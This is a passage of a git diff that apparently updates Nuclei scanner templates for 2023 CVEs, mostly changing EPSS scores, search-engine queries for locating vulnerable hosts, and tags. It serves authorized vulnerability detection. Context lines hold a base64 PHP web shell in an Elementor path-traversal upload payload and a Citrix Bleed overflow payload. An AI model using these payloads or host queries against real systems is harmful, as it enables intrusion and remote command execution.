"XSRF-TOKEN=([^;]+)" internal: true -# digest: 4a0a004730450221009867ad8a1d9d6ee3be61f018a8148d4cce2490309e5b9b91976fe18caa6b823d02204bde4220f162aeb9c5b07eb8c3a7a6fc0379c2b4408a5457efeabf457cb3f75f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201738e663e68bb906203de6a56424f8696e9bdd5329ce6d18b5a72648017e5a810220670887eb41d7f62a8e6ca4c71bc43e05b42c8c90d3687ae87925fe80135dddc5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-48023.yaml b/http/cves/2023/CVE-2023-48023.yaml index dbb59e4a31..ce1494b39e 100644 --- a/http/cves/2023/CVE-2023-48023.yaml +++ b/http/cves/2023/CVE-2023-48023.yaml @@ -22,9 +22,15 @@ info: metadata: verified: true max-request: 1 - vendor: Anyscale - shodan-query: http.favicon.hash:463802404 - tags: cve,cve2023,ssrf,ray,anyscale + vendor: ray_project + shodan-query: + - http.favicon.hash:463802404 + - http.html:"ray dashboard" + product: ray + fofa-query: + - icon_hash=463802404 + - body="ray dashboard" + tags: cve,cve2023,ssrf,ray,anyscale,Anyscale http: - method: GET @@ -42,4 +48,4 @@ http: part: body words: - "

Interactsh Server

" -# digest: 4a0a00473045022100b701a3393f6a0c326a191f9b9570223ac48ecec79d89aee03232c824d80df162022040d57b11f6cfe588b60f4f5448e65429613c5cb117f7a694dd81f05b111a7cfa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207b4551473a09c16f6d6954d33b3b2bac9d42d1697fa91e804e02ee4aaf2cddf6022100e9150619a103c275d6dba6221898a72ba5d4ea31c7420d02fdc6b0d6d2d50e51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-48084.yaml b/http/cves/2023/CVE-2023-48084.yaml index 67ded92e4f..b4790aa481 100644 --- a/http/cves/2023/CVE-2023-48084.yaml +++ b/http/cves/2023/CVE-2023-48084.yaml @@ -14,21 +14,27 @@ info: - https://github.com/bucketcat/CVE-2023-48084 - https://github.com/Hamibubu/CVE-2023-48084 - https://nvd.nist.gov/vuln/detail/CVE-2023-48084 + - https://github.com/nomi-sec/PoC-in-GitHub classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-48084 cwe-id: CWE-89 epss-score: 0.00114 - epss-percentile: 0.44333 + epss-percentile: 0.44856 cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:* metadata: - max-request: 3 verified: true + max-request: 3 vendor: nagios product: nagios_xi - fofa-query: title="Nagios XI" - tags: cve,cve2023,nagiosxi,sqli,authenticated + shodan-query: http.title:"nagios xi" + fofa-query: + - title="Nagios XI" + - title="nagios xi" + - app="nagios-xi" + google-query: intitle:"nagios xi" + tags: cve,cve2023,nagiosxi,sqli,authenticated,nagios http: - raw: @@ -68,4 +74,4 @@ http: regex: - 'name="nsp" value="(.*)">' internal: true -# digest: 4a0a0047304502204fbd6201bf925ccc24095849207a7b720d4bc11d315f598c77f8d89bf49bf70b022100dd8640ebaef3939c2317cc833a62e524308e3f0b1037da30858e14db33d28577:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220623f7fb2b34ade32923274720fe9a2b327b9ac34899c696d8ecccdc433721f6e022100e5f82eb99ea3cbe02399c7de0f20d00eb874b79262bc835e67c77a461141c2ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-48777.yaml b/http/cves/2023/CVE-2023-48777.yaml index 58d147569a..0159236de2 100644 --- a/http/cves/2023/CVE-2023-48777.yaml +++ b/http/cves/2023/CVE-2023-48777.yaml @@ -9,13 +9,20 @@ info: remediation: Fixed in 3.18.2 reference: - https://wpscan.com/vulnerability/a6b3b14c-f06b-4506-9b88-854f155ebca9/ + - https://patchstack.com/database/vulnerability/elementor/wordpress-elementor-plugin-3-18-0-arbitrary-file-upload-vulnerability?_s_id=cve + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H + cvss-score: 9.9 + cve-id: CVE-2023-48777 + cwe-id: CWE-434 + epss-score: 0.00054 + epss-percentile: 0.21518 metadata: verified: true max-request: 4 framework: wordpress publicwww-query: "/wp-content/plugins/elementor/" tags: cve,cve2023,elementor,file-upload,intrusive,rce,wpscan,wordpress,wp-plugin,authenticated - variables: filename: "{{rand_base(6)}}" payload: '{"import_template":{"action":"import_template","data":{"fileName":"/../../../../{{filename}}.php","fileData":"PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4="}}}' @@ -59,4 +66,4 @@ http: group: 1 regex: - 'admin\\\/admin\-ajax\.php","nonce":"([0-9a-z]+)"' -# digest: 4b0a00483046022100b71e9b31dece4dcf31fbd4629f0aea2339c0ec8922cf20066400a2d2232bca0c02210091ea465a635a3c4c909c86e44122140e35c0f0fc6fb70e2e4182abe48c32c568:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008bf58aa24ddd3c56ea97495962a5596e8fb115ff791e778f798822b880762953022100e12cc588c2b1eb10312f7c33f124907aaea0088092f98148f02bb2622e8bd232:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-49070.yaml b/http/cves/2023/CVE-2023-49070.yaml index d756062547..4c2c0b4e95 100644 --- a/http/cves/2023/CVE-2023-49070.yaml +++ b/http/cves/2023/CVE-2023-49070.yaml @@ -18,15 +18,21 @@ info: cvss-score: 9.8 cve-id: CVE-2023-49070 cwe-id: CWE-94 - epss-score: 0.84671 - epss-percentile: 0.98424 + epss-score: 0.79399 + epss-percentile: 0.98282 cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache product: ofbiz - shodan-query: html:"OFBiz" - fofa-query: app="Apache_OFBiz" + shodan-query: + - html:"OFBiz" + - http.html:"ofbiz" + - ofbiz.visitor= + fofa-query: + - app="Apache_OFBiz" + - body="ofbiz" + - app="apache_ofbiz" tags: cve,cve2023,seclists,apache,ofbiz,deserialization,rce http: @@ -66,4 +72,4 @@ http: part: body words: - 'faultString' -# digest: 490a0046304402204cb018d762f46c2e5e8cb350f854276c066d67c1015036226a34c6c3775f90ba022033532329a0007b50a17936c876d60125819c0ddd3c928fe9c8f7a073477f9f23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220740b14d8eef1aba127b708193d7b94fb5304bc6c63c705a09ae663b21e27d8a9022100f8c549328c35cf51373ab2de543caabae74b109d9fba9f03e92b081567099313:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-49103.yaml b/http/cves/2023/CVE-2023-49103.yaml index a1a1d94f6c..fa01d53757 100644 --- a/http/cves/2023/CVE-2023-49103.yaml +++ b/http/cves/2023/CVE-2023-49103.yaml @@ -26,7 +26,11 @@ info: max-request: 2 vendor: owncloud product: graph_api - shodan-query: title:"owncloud" + shodan-query: + - title:"owncloud" + - http.title:"owncloud" + fofa-query: title="owncloud" + google-query: intitle:"owncloud" tags: cve2023,cve,owncloud,phpinfo,config,kev http: @@ -50,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202c85400417407f6aac6df36734965deaa263220c0230c4678102057a7d2c1943022100ab418a18a583650277b037d51eae65600cc8369ba16a577d6b75ebbbccf748a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220043300e3d261edbf2297cc82c3bfedf84abe9d4cd824a6fa06a3232774d02425022100be760480bfaf9f15aa035cfb3c7fabbb475c7abc9582d9f2783c54bdeb30075d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4966.yaml b/http/cves/2023/CVE-2023-4966.yaml index 04f7011d2b..59ac752dfe 100644 --- a/http/cves/2023/CVE-2023-4966.yaml +++ b/http/cves/2023/CVE-2023-4966.yaml @@ -17,15 +17,19 @@ info: cvss-score: 7.5 cve-id: CVE-2023-4966 cwe-id: CWE-119,NVD-CWE-noinfo - epss-score: 0.96486 - epss-percentile: 0.9956 + epss-score: 0.9671 + epss-percentile: 0.99651 cpe: cpe:2.3:a:citrix:netscaler_application_delivery_controller:*:*:*:*:fips:*:*:* metadata: verified: "true" max-request: 2 vendor: citrix product: netscaler_application_delivery_controller - shodan-query: title:"Citrix Gateway" || title:"Netscaler Gateway" + shodan-query: + - title:"Citrix Gateway" || title:"Netscaler Gateway" + - http.title:"citrix gateway" || title:"netscaler gateway" + fofa-query: title="citrix gateway" || title:"netscaler gateway" + google-query: intitle:"citrix gateway" || title:"netscaler gateway" tags: cve,cve2023,citrix,adc,info-leak,kev,exposure variables: payload: '{{repeat("a", 24812)}}' @@ -69,4 +73,4 @@ http: - type: word words: - '{"issuer":' -# digest: 490a00463044022077a1993e71e5fdd1862f1a2d4aa26ebf04e622ba6bbe56becbbdec39290eaf4a022045fc84cc3e43c597238379bc66e4ff39d89c0e483283a9891d37feedd9e4328f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d53c103c37fab6d039e715bd8916c5d7fb079cc8721531b1d40ad2fd83241fb5022100ae404d6a85e19235109ce7bfc81e185177cd90121910b674c011b6673c6d43ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4973.yaml b/http/cves/2023/CVE-2023-4973.yaml index 9094021c35..a2a85e4b84 100644 --- a/http/cves/2023/CVE-2023-4973.yaml +++ b/http/cves/2023/CVE-2023-4973.yaml @@ -20,9 +20,13 @@ info: max-request: 1 vendor: creativeitem product: academy_lms - shodan-query: html:"Academy LMS" - fofa-query: body="Academy LMS" - tags: cve2023,cve,academylms,xss,creativeitem + shodan-query: + - html:"Academy LMS" + - http.html:"academy lms" + fofa-query: + - body="Academy LMS" + - body="academy lms" + tags: packetstorm,cve2023,cve,academylms,xss,creativeitem http: - method: GET @@ -36,4 +40,4 @@ http: - 'contains(header, "text/html")' - 'contains_all(body, "", "List of tuitions")' condition: and -# digest: 490a0046304402204b8dd881b5a0b3f7d38c4d13a40eb9e39cc3726f383612727f6b2ee9cba71b9002204c739c7fc378e976f510cb9fe88163ebae00d114bc2fc1c226a888889e010c73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022003e0aa31c056206272163376e4fb2c16f1424282178f7657a1304483ba6b675702202d0e0134266df1580d750c23d6339d934549b7fa97dd0ff6b4dffc6ae03e38e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4974.yaml b/http/cves/2023/CVE-2023-4974.yaml index 41734343b9..696a10e377 100644 --- a/http/cves/2023/CVE-2023-4974.yaml +++ b/http/cves/2023/CVE-2023-4974.yaml @@ -17,15 +17,18 @@ info: cvss-score: 9.8 cve-id: CVE-2023-4974 cwe-id: CWE-89 - epss-score: 0.01914 - epss-percentile: 0.87302 + epss-score: 0.02153 + epss-percentile: 0.89309 cpe: cpe:2.3:a:creativeitem:academy_lms:6.2:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: creativeitem product: academy_lms - shodan-query: html:"Academy LMS" + shodan-query: + - html:"Academy LMS" + - http.html:"academy lms" + fofa-query: body="academy lms" tags: cve,cve2023,packetstorm,sqli,academy,lms,creativeitem http: @@ -42,4 +45,4 @@ http: - status_code == 500 - contains(body, "Courses") condition: and -# digest: 4a0a0047304502204ad6b4b3c504339e1eeee78972bb616e3b8b37d27deb376fb167ce3bc3897c77022100f2b344f17ba4ddc98660eb960d6550db34f15aa659a920ef055b0545daf67cd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201dcf423b4b6924981e6abf474979ba0989f52fc8514307b6c99025e5f0d845c3022100fae8105c7521925c94ec0ccbdf1ff865446dffecffab99eaf917da8fba3c104f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-49785.yaml b/http/cves/2023/CVE-2023-49785.yaml index d63794ba0e..83d09706b7 100644 --- a/http/cves/2023/CVE-2023-49785.yaml +++ b/http/cves/2023/CVE-2023-49785.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-49785 cwe-id: CWE-79 epss-score: 0.00049 - epss-percentile: 0.1584 + epss-percentile: 0.17861 metadata: verified: true max-request: 2 @@ -43,4 +43,4 @@ http: - contains(header_2,'X-Interactsh-Version') - contains(interactsh_protocol_2,'dns') condition: and -# digest: 4a0a004730450220044ba08dbbf92281a704e216fb48e6c232f709b05709515bc4ad70388bea4317022100a9e4de43629f0f51e429598a924f63d6133561711039b0e3b7ca1cdeb64e7895:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200f5f4fba67fb181f704f72f18c9db6666aa2ff4859a5509c3338dba108adaf28022100ad3687eb82d2a9dfe75eb024c74ec79198c01a339f73d1c40b0420240c68dfae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-5003.yaml b/http/cves/2023/CVE-2023-5003.yaml index 37f74e205f..adf1fea821 100644 --- a/http/cves/2023/CVE-2023-5003.yaml +++ b/http/cves/2023/CVE-2023-5003.yaml @@ -14,16 +14,16 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-5003 - epss-score: 0.00084 - epss-percentile: 0.35074 + epss-score: 0.00419 + epss-percentile: 0.7409 cpe: cpe:2.3:a:miniorange:active_directory_integration_\/_ldap_integration:*:*:*:*:*:wordpress:*:* metadata: + verified: true + max-request: 1 vendor: miniorange product: active_directory_integration_\/_ldap_integration framework: wordpress - verified: true - max-request: 1 - tags: wpscan,exposure,csv,ldap,cve2023,wordpress,wp-plugin + tags: wpscan,exposure,csv,ldap,wordpress,wp-plugin,cve,cve2023,miniorange http: - method: GET @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bd156a20bbfa2b8fcbab364a68192646c450da886c638558ab7c88166483aa44022100d58dac4f441a368fc420c322d67aef9bfeecadc03665b62bf18dc363f7421566:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204fcec3fd699084b441ca3a706cf44ff0521716935ee18cebb1efb184eb2b15a20221009553830ff5f7b4dd5de086b1a2afae4f141b17c89d13d153b6dd97702002ee2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-50290.yaml b/http/cves/2023/CVE-2023-50290.yaml index 970e880864..71f19f0bc8 100644 --- a/http/cves/2023/CVE-2023-50290.yaml +++ b/http/cves/2023/CVE-2023-50290.yaml @@ -22,13 +22,23 @@ info: cve-id: CVE-2023-50290 cwe-id: CWE-200,NVD-CWE-noinfo epss-score: 0.05452 - epss-percentile: 0.92995 + epss-percentile: 0.93157 cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache product: solr - shodan-query: "title:\"Apache Solr\"" + shodan-query: + - "title:\"Apache Solr\"" + - http.title:"apache solr" + - cpe:"cpe:2.3:a:apache:solr" + - http.title:"solr admin" + fofa-query: + - title="solr admin" + - title="apache solr" + google-query: + - intitle:"apache solr" + - intitle:"solr admin" tags: cve,cve2023,apache,solr,exposure http: @@ -54,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ab90dd8cf4551a04f3e326cc482e51353c3f2f56a1df3d185a4c5339cb15443302205dca7fcd5ff9fe5fe740d2681a563cebd4075d41d70f97abad4c7d2ae2e4f160:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022032c22d2f2f08912db32782312629457f03184a56631aa39d3cb5ac8e77ee86a202204951ff3e98e750b1b2cc2b50e2f68c1d7976f8b71d2d79af28c8208e522aaac7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-5074.yaml b/http/cves/2023/CVE-2023-5074.yaml index 9c0ebc96d2..c6f5ea43af 100644 --- a/http/cves/2023/CVE-2023-5074.yaml +++ b/http/cves/2023/CVE-2023-5074.yaml @@ -18,15 +18,17 @@ info: cvss-score: 9.8 cve-id: CVE-2023-5074 cwe-id: CWE-798 - epss-score: 0.01695 - epss-percentile: 0.87453 + epss-score: 0.01843 + epss-percentile: 0.88296 cpe: cpe:2.3:a:dlink:d-view_8:2.0.1.28:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: dlink product: d-view_8 - shodan-query: http.favicon.hash:-1317621215 + shodan-query: + - http.favicon.hash:-1317621215 + - http.favicon.hash:"-1317621215" fofa-query: icon_hash="-1317621215" tags: cve2023,cve,d-link,auth-bypass,dlink @@ -44,4 +46,4 @@ http: - 'contains(body, "userName") && contains(body, "passWord") && contains(body, "isEmailActivate")' - 'contains(header, "application/json")' condition: and -# digest: 4b0a00483046022100df91a0e799ab437aded5b1e9356b00c8a63803525cd7a4b511a6a90c80fe4c58022100eb14a4a52eac5c1d7dceaf823ff1aab3ad05bd419e17aac856014de6121c5f37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ef974764719aca504fd797757668c8d85cd49d27a627d2312f56a94961c08122022065c89d47dc88de99520cf4af0aed01eef85a713b92a3cea324ca68e8fdd7af55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-5089.yaml b/http/cves/2023/CVE-2023-5089.yaml index 1036b74c92..e09912084d 100644 --- a/http/cves/2023/CVE-2023-5089.yaml +++ b/http/cves/2023/CVE-2023-5089.yaml @@ -15,8 +15,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2023-5089 - epss-score: 0.00306 - epss-percentile: 0.6923 + epss-score: 0.00291 + epss-percentile: 0.69035 cpe: cpe:2.3:a:wpmudev:defender_security:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -24,8 +24,10 @@ info: vendor: wpmudev product: defender_security framework: wordpress + shodan-query: http.html:/wp-content/plugins/defender-security/ + fofa-query: body=/wp-content/plugins/defender-security/ publicwww-query: "/wp-content/plugins/defender-security/" - tags: cve,cve2023,wordpress,wpscan,wp-plugin,defender-security,redirect + tags: cve,cve2023,wordpress,wpscan,wp-plugin,defender-security,redirect,wpmudev http: - method: GET @@ -47,4 +49,4 @@ http: - type: kval kval: - location -# digest: 4b0a00483046022100fd7d861e3f17c0f6e97ee8e723140f3d0c5ec3a282c2dd21b03bf8892b75221502210096307b8b6a2f292b107ed285cffa2143500095d5beca7867a0488e3b1ca6b8e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d66beed359c83006b9629ad191773331ca489271eefc9d64a540916b6eda004802206d977265f836902b119d0831d714ae8053ec107bc86e95dd0c2640c04579436a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-50917.yaml b/http/cves/2023/CVE-2023-50917.yaml index 2d94b93d85..19088e23a4 100644 --- a/http/cves/2023/CVE-2023-50917.yaml +++ b/http/cves/2023/CVE-2023-50917.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-50917 cwe-id: CWE-77 - epss-score: 0.71101 - epss-percentile: 0.97965 + epss-score: 0.70095 + epss-percentile: 0.98019 cpe: cpe:2.3:a:mjdm:majordomo:*:*:*:*:*:*:*:* metadata: verified: true @@ -26,8 +26,11 @@ info: vendor: mjdm product: majordomo shodan-query: http.favicon.hash:1903390397 - fofa-query: app="MajordomoSL" - tags: packetstorm,seclists,cve,cve2023,majordomo,rce,os + fofa-query: + - app="MajordomoSL" + - app="majordomosl" + - icon_hash=1903390397 + tags: packetstorm,seclists,cve,cve2023,majordomo,rce,os,mjdm http: - method: GET @@ -46,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220595b1f4c2aad492c7ab53117f7f5878c7d2174357e2700274d277e89dc4b74c5022100ec8ce13cf48cb89871ddb8f797b38eb2776b8811e860285e586747386d5158c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022068e65beb56aaa06e7d75656ee95a0bc327651196bd6781bce7815e0494e15ce102201d0a3353c30b2fa1270cd29cfc4af8a8df6cd56a06b17e781ba86db3ce853e26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-50968.yaml b/http/cves/2023/CVE-2023-50968.yaml index ac84dea108..3c4af40b7d 100644 --- a/http/cves/2023/CVE-2023-50968.yaml +++ b/http/cves/2023/CVE-2023-50968.yaml @@ -17,16 +17,22 @@ info: cvss-score: 7.5 cve-id: CVE-2023-50968 cwe-id: CWE-918,CWE-200 - epss-score: 0.32266 - epss-percentile: 0.96905 + epss-score: 0.23447 + epss-percentile: 0.96556 cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: verified: true max-request: 4 vendor: apache product: ofbiz - shodan-query: html:"OFBiz" - fofa-query: app="Apache_OFBiz" + shodan-query: + - html:"OFBiz" + - http.html:"ofbiz" + - ofbiz.visitor= + fofa-query: + - app="Apache_OFBiz" + - body="ofbiz" + - app="apache_ofbiz" tags: cve,cve2023,apache,ofbiz,ssrf variables: str: "{{rand_base(6)}}" @@ -62,4 +68,4 @@ http: part: header words: - 'OFBiz.Visitor=' -# digest: 4b0a00483046022100ac3f5290f42a5505e64248fbfea21473f85564876a36a8cec075997c1c32c826022100ce68660c0cd23db374c20b2912451c2339332565ce61a6375edb5e9d85761e59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a7c632b2971df4f69ad28132c54b26a3d0b8a8e45c8442612da9072e45190ceb022032552a4f03e7a272c0b0ef83cfe0e8c6cb5517eb9c443aab72ab8689070c8158:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-51467.yaml b/http/cves/2023/CVE-2023-51467.yaml index b8baaab188..9fbb9682fc 100644 --- a/http/cves/2023/CVE-2023-51467.yaml +++ b/http/cves/2023/CVE-2023-51467.yaml @@ -17,15 +17,21 @@ info: cvss-score: 9.8 cve-id: CVE-2023-51467 cwe-id: CWE-918 - epss-score: 0.68495 - epss-percentile: 0.97894 + epss-score: 0.58267 + epss-percentile: 0.97731 cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache product: ofbiz - shodan-query: html:"OFBiz" - fofa-query: app="Apache_OFBiz" + shodan-query: + - html:"OFBiz" + - http.html:"ofbiz" + - ofbiz.visitor= + fofa-query: + - app="Apache_OFBiz" + - body="ofbiz" + - app="apache_ofbiz" tags: cve2023,cve,apache,ofbiz,rce http: @@ -48,4 +54,4 @@ http: part: header words: - 'OFBiz.Visitor=' -# digest: 4a0a0047304502203c57270ab59d7bb994c9c151f2d2fd77583f905570eabb408ebd6b13be0cb769022100f9c9673ed3529407d3fc42ccf9af89de53dae6afa4b72b939c0ad1c2c4a1e6bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b1174f5e1d75faf17b66721527129b7e78eb527e22950400cc84c1e138218204022009f55a97efe8837f938969eeb491a4d5d83461831d844785e8b139881d19a963:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-52085.yaml b/http/cves/2023/CVE-2023-52085.yaml index b038059ace..e0306d9228 100644 --- a/http/cves/2023/CVE-2023-52085.yaml +++ b/http/cves/2023/CVE-2023-52085.yaml @@ -15,14 +15,19 @@ info: cve-id: CVE-2023-52085 cwe-id: CWE-22 epss-score: 0.00256 - epss-percentile: 0.64798 + epss-percentile: 0.65415 cpe: cpe:2.3:a:wintercms:winter:*:*:*:*:*:*:*:* metadata: max-request: 4 vendor: wintercms product: winter - shodan-query: "title:\"Winter CMS\"" - fofa-query: "title=\"Winter CMS\"" + shodan-query: + - "title:\"Winter CMS\"" + - http.title:"winter cms" + fofa-query: + - "title=\"Winter CMS\"" + - title="winter cms" + google-query: intitle:"winter cms" tags: cve,cve2023,authenticated,lfi,wintercms http: @@ -69,4 +74,4 @@ http: regex: - '' internal: true -# digest: 4a0a00473045022044f10a2ac5ef090fdbe4307044fba2814a499e32ea22d76b1574a346ff2ca1e0022100c28977b6ba6dea5cd3cc95c633cb2e6d9f06fafaf15d1a9a7ec2f5ffc35c278f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200e104a483850d66787d611030336f222ee3d4972ef37c8039c12a483b4e5b2a60220155396fef3818a7af539443ef744dfc91bb98446c28034964a036156915641d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-5244.yaml b/http/cves/2023/CVE-2023-5244.yaml index f3c8722b3c..bcdd630272 100644 --- a/http/cves/2023/CVE-2023-5244.yaml +++ b/http/cves/2023/CVE-2023-5244.yaml @@ -17,15 +17,20 @@ info: cvss-score: 6.1 cve-id: CVE-2023-5244 cwe-id: CWE-79 - epss-score: 0.00064 - epss-percentile: 0.2616 + epss-score: 0.00176 + epss-percentile: 0.54692 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: microweber product: microweber - shodan-query: http.favicon.hash:780351152 + shodan-query: + - http.favicon.hash:780351152 + - http.html:"microweber" + fofa-query: + - body="microweber" + - icon_hash=780351152 tags: cve,cve2023,huntr,xss,microweber http: @@ -40,4 +45,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "alert(document.domain)", "microweber")' condition: and -# digest: 4a0a0047304502205e0b75159b6a35f3ba0a932e91972202bf83f4a1e487767247e555cf6f735881022100e1e2601bf631df27268a7b8b3d603b8a3d9e13d8d8f11a1a45da6003b4be53d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100819eecaa7e19bdcec5d1b84bf0c64575dc5c21adacaf63de71d909313b242221022100d4583f27f0819431ae6d3290dc62087423c4c633c767377c2663402c7ef8539e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-5360.yaml b/http/cves/2023/CVE-2023-5360.yaml index 583aa0b3bf..d75b685551 100644 --- a/http/cves/2023/CVE-2023-5360.yaml +++ b/http/cves/2023/CVE-2023-5360.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-5360 cwe-id: CWE-434 - epss-score: 0.96723 - epss-percentile: 0.99637 + epss-score: 0.96512 + epss-percentile: 0.99596 cpe: cpe:2.3:a:royal-elementor-addons:royal_elementor_addons:*:*:*:*:*:wordpress:*:* metadata: verified: "true" @@ -27,9 +27,10 @@ info: vendor: royal-elementor-addons product: royal_elementor_addons framework: wordpress + shodan-query: http.html:/plugins/royal-elementor-addons/ + fofa-query: body=/plugins/royal-elementor-addons/ publicwww-query: "/plugins/royal-elementor-addons/" tags: wpscan,packetstorm,cve,cve2023,rce,wordpress,wp-plugin,wp,royal-elementor-addons,unauth,intrusive - variables: file: "{{to_lower(rand_text_alpha(5))}}" string: "CVE-2023-5360" @@ -89,4 +90,4 @@ http: regex: - 'wp-content\\\/uploads\\\/wpr-addons\\\/forms\\\/(.*?).php' internal: true -# digest: 4a0a0047304502204665cabc6c8c44c3492f9c39c134e9b8c31ea03dbf553b0a56e0fcf05e55bb250221008335b09068b0bd294ca32ba10a94b16b44feb5888b2edf5f8d95651af7ef79ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ecc02e14e699cb2527c3ced6d5491e5c900a65de2dfa04098e53be87b1d38f360220425fbf0adbafce13c5c0c2558453f0d6dd81dbad1eb256caa6ce304281b74633:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-5375.yaml b/http/cves/2023/CVE-2023-5375.yaml index 7cb9ec08d1..4665d7d733 100644 --- a/http/cves/2023/CVE-2023-5375.yaml +++ b/http/cves/2023/CVE-2023-5375.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-5375 cwe-id: CWE-601 - epss-score: 0.00083 - epss-percentile: 0.339 + epss-score: 0.00092 + epss-percentile: 0.39191 cpe: cpe:2.3:a:mosparo:mosparo:*:*:*:*:*:*:*:* metadata: verified: true @@ -37,4 +37,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.pro.*$' -# digest: 4a0a00473045022076e656e11cb00070c5a59a08ecaad48f28beabbdfe91944e5eb2a824ca06d899022100fbd1daa4c3844c157f8a9bea25711e36c07267fe37ab3ea314e233bc14f0ea8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100adf80dbae3063d1c8914173cf09b200f59b74231ab14a65f5cbe8bc6bb04c4f5022100c7054098ab7e244fd8edc9b92ff8a67ed416ba75b114d45c2d275b1ac7e7e359:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-5556.yaml b/http/cves/2023/CVE-2023-5556.yaml index 07dd43ff62..2f8d4d5226 100644 --- a/http/cves/2023/CVE-2023-5556.yaml +++ b/http/cves/2023/CVE-2023-5556.yaml @@ -18,13 +18,14 @@ info: cve-id: CVE-2023-5556 cwe-id: CWE-79 epss-score: 0.00064 - epss-percentile: 0.26117 + 